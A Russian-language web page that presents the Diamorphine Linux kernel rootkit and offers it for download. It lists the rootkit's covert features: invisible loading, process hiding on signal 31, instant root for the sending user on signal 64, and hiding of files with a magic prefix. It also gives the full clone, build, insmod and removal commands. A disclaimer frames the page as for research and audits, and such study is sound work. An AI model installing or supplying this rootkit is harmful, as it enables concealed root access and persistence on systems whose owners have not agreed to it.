Diamorphine – LKM Rootkit для ядра Linux 2.6.x / 3.x / 4.x.

Diamorphine – это руткит LKM для ядер Linux 2.6.x / 3.x / 4.x.

Особенности

• При загрузке модуль стартует невидимым
  
• Возможность скрыть / показать любой процесс, отправив сигнал 31;
  
•  Отправка сигнала 63 (любому pid) делает модуль видимым;
  
• Отправка сигнала 64 (любому pid) делает данного пользователя root;
  
• Файлы или каталоги, начинающиеся с MAGIC_PREFIX, становятся невидимыми;
  
• Источник: https://github.com/m0nad/Diamorphine

Установка

Убедитесь, что ядро 2.6.x / 3.x / 4.x.

 # uname -r 

Клонируем репозиторий

 # git clone https://github.com/m0nad/Diamorphine 

Заходим в каталог

 # cd Diamorphine 

Собираем

 # make 

Загрузите модуль (как root)

 # insmod diamorphine.ko 

Удаление

Модуль стартует невидимым, чтобы удалить его, надо сделать его видимым системе

 # kill -63 0 

Затем удалите модуль (как root)

 # rmmod diamorphine 

Скачать Diamorphine

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.